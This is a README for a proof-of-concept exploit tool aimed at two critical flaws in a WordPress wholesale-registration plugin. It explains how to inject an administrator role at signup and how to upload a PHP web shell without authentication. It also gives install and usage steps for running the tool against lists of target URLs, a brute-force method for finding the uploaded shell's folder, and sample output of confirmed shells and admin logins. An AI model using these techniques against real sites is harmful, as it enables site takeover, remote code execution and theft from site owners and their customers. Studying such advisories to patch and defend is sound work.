Exploit for CVE-2026-27542-CVE-2026-27540- CVE-2026-27540 CVE-2026-27542

## https://sploitus.com/exploit?id=A1F514F0-9DB7-5283-8202-5C1C9F4B6A41
---

## 🔴 Vulnerability Overview

### CVE-2026-27542 — Unauthenticated Privilege Escalation

| Field | Details |
|---|---|
| **CVE ID** | CVE-2026-27542 |
| **Severity** | **CRITICAL** — CVSS v3.1 Score: **9.8** |
| **Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **Affected Component** | WooCommerce Wholesale Lead Capture (WWLC) Plugin for WordPress |
| **Vulnerability Type** | Unauthenticated Privilege Escalation |
| **Authentication Required** | None |
| **CWE** | CWE-269: Improper Privilege Management |

**Description:**  
The WooCommerce Wholesale Lead Capture plugin for WordPress is vulnerable to **Unauthenticated Privilege Escalation** in all known affected versions. The vulnerability exists within the `wwlc_create_user` AJAX action handler, which processes user registration requests without adequately sanitizing or validating user-supplied role fields. A remote, unauthenticated attacker can craft a specially formed POST request that injects arbitrary WordPress capability fields — including `wp_capabilities[administrator]` — directly into the user metadata at the time of account creation. This allows the attacker to self-register as a WordPress administrator without any prior authentication or interaction from a legitimate user, resulting in complete compromise of the affected WordPress installation.

---

### CVE-2026-27540 — Unauthenticated Arbitrary File Upload

| Field | Details |
|---|---|
| **CVE ID** | CVE-2026-27540 |
| **Severity** | **CRITICAL** — CVSS v3.1 Score: **9.8** |
| **Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **Affected Component** | WooCommerce Wholesale Lead Capture (WWLC) Plugin for WordPress |
| **Vulnerability Type** | Unauthenticated Arbitrary File Upload (leading to Remote Code Execution) |
| **Authentication Required** | None |
| **CWE** | CWE-434: Unrestricted Upload of File with Dangerous Type |

**Description:**  
The WooCommerce Wholesale Lead Capture plugin for WordPress is vulnerable to **Unauthenticated Arbitrary File Upload** in all known affected versions. The vulnerability resides in the `wwlc_file_upload_handler` AJAX action, which is registered without any authentication or nonce verification requirement. By submitting a crafted multipart POST request to `/wp-admin/admin-ajax.php`, a remote unauthenticated attacker can upload files of arbitrary type — including PHP web shells — to the server's `wp-content/uploads/` directory under a dynamically generated `wwlc-temp-*` subdirectory. Successful exploitation leads to **Remote Code Execution (RCE)** on the underlying web server operating as the web process user account.

---

## 🛠️ Tool Description

This is a **Proof-of-Concept (PoC)** exploitation script for the two critical vulnerabilities described above, targeting WordPress installations running the **WooCommerce Wholesale Lead Capture** plugin. The tool supports two independent attack modes:

| Mode | Attack Type | Goal |
|---|---|---|
| **Mode 1** | Unauthenticated Arbitrary File Upload + Brute-Force folder discovery | Upload a PHP web shell and locate it via multi-layer folder guessing |
| **Mode 2** | Unauthenticated Privilege Escalation via Registration | Self-register as WordPress Administrator and verify admin access |

---

## 📋 Requirements

### System Requirements
- Python **3.8** or higher
- Internet access to target(s)
- Linux / Windows / macOS

### Python Dependencies

```bash
pip install requests urllib3 colorama
```

Or install via requirements file:

```bash
pip install -r requirements.txt
```

**`requirements.txt`:**
```
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6
```

---

## 🚀 Installation

```bash
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-27542-CVE-2026-27540.git
cd CVE-2026-27542-CVE-2026-27540

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-27542_CVE-2026-27540.py
```

---

## ⚙️ Usage

### Basic Run

```bash
python3 CVE-2026-27542_CVE-2026-27540.py
```

The tool presents an interactive terminal interface. You will be prompted for all required parameters.

---

### 🗂️ Target List Format

Create a plain text file (e.g., `list.txt`) with one target URL per line:

```
https://target1.com
https://target2.com
http://target3.com/wordpress
```

---

### 🔴 Mode 1 — File Upload + Folder Brute-Force

```
Select mode [1=Upload+Folder, 2=Registration+Admin]: 1
Targets list file (one URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Shell file path [shell.php]: shell.php
Shell signature (marker inside shell) [Nx_SHELL_SIGNATURE]: Nx_SHELL_SIGNATURE
Max pattern-based folder guesses per site [50000]: 50000
Max time-based folder guesses per site [50000]: 50000
Max random-hex folder guesses per site [100000]: 100000
Upload results file [scan_results/wwlc_uploads.txt]: scan_results/wwlc_uploads.txt
Found shells file [scan_results/wwlc_shells_found.txt]: scan_results/wwlc_shells_found.txt
```

**Shell file example (`shell.php`):**
```php

```

> **Note:** The `wwlc-temp-*` folder is dynamically generated by the plugin using PHP's `uniqid('wwlc-temp-')`. The tool uses a multi-layer brute-force strategy to discover it:
>
> | Layer | Strategy | Description |
> |---|---|---|
> | 0 | Directory Listing | Attempts to list uploads directory if open |
> | 1 | Pattern-Based | Time-derived and sequential numeric guesses |
> | 2 | Time-Based Hex | Seeded by observed HTTP request timestamps |
> | 3 | Random Hex | Pure random hex string guessing |

---

### 🟠 Mode 2 — Registration + Role Injection + Admin Verification

```
Select mode [1=Upload+Folder, 2=Registration+Admin]: 2
Targets list file (one URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Base registration username (prefix) [Nx_admin]: Nx_admin
Base registration email [nx_admin@example.com]: nx_admin@example.com
Registration results file [scan_results/wwlc_register_results.txt]:
Admin hits file [scan_results/Admin_login.txt]:
```

The tool:
1. Discovers the WWLC registration form and extracts a valid nonce
2. Submits a crafted registration payload injecting `administrator` role
3. Attempts to log in with the created credentials
4. Verifies admin panel access across multiple WP admin endpoints
5. Saves confirmed admin hits to the output file

---

## 📁 Output Files

| File | Description |
|---|---|
| `scan_results/wwlc_uploads.txt` | All sites where file upload succeeded (Mode 1) |
| `scan_results/wwlc_shells_found.txt` | Full shell URLs that were confirmed accessible (Mode 1) |
| `scan_results/wwlc_register_results.txt` | All registration attempt results with credentials (Mode 2) |
| `scan_results/Admin_login.txt` | Confirmed admin login hits with credentials (Mode 2) |

### Sample Output (Mode 2 — Admin Hit)

```
[INFO]    Mode2 | Target: https://target.com
[SUCCESS] https://target.com | nonce found on /wholesale-register/: a1b2c3d4e5
[INFO]    https://target.com | using discovered nonce
[SUCCESS] https://target.com | registration success for user=Nx_admin_x7k2
[SUCCESS] https://target.com | ADMIN login confirmed as Nx_admin_x7k2
```

### Sample Output (Mode 1 — Shell Found)

```
[INFO]    Mode1 | Target: https://target.com
[INFO]    https://target.com | upload HTTP time: 0.847s
[SUCCESS] https://target.com | upload success file_name=shell_abc123.php
[INFO]    https://target.com | pattern brute-force (50003 guesses)
[SUCCESS] https://target.com | shell FOUND via pattern: https://target.com/wp-content/uploads/wwlc-temp-00000123/shell_abc123.php
[INFO]    https://target.com | folder scan stats: attempts=123, time=4.213s, rate=29.2 req/s
```

---

## 📡 Contact & Author


  By: Nxploited (Khaled Alenazi)
  
    
  
   
  
    
  


---

## ⚠️ Legal Disclaimer

> **THIS TOOL IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY RESEARCH PURPOSES ONLY.**
>
> The author, **Nxploited (Khaled Alenazi)**, and all contributors to this project **do not condone, support, or take any responsibility** for the misuse of this tool or any damage caused by the use of this software against systems for which you do not have explicit written authorization.
>
> - ✅ **Permitted:** Use on systems you own or have been granted explicit written permission to test.
> - ❌ **Prohibited:** Use against any systems without prior explicit written authorization from the system owner.
>
> **Unauthorized access to computer systems is illegal and punishable under applicable laws** including but not limited to the Computer Fraud and Abuse Act (CFAA), the Computer Misuse Act (CMA), and equivalent legislation worldwide.
>
> **By using this tool, you accept sole responsibility for your actions and confirm that you have the legal authority to test the targeted systems.**
>
> The author assumes **no liability** whatsoever for any direct, indirect, incidental, or consequential damages arising from the use or misuse of this software.

---


  © 2026 Nxploited (Khaled Alenazi) — For authorized security research only.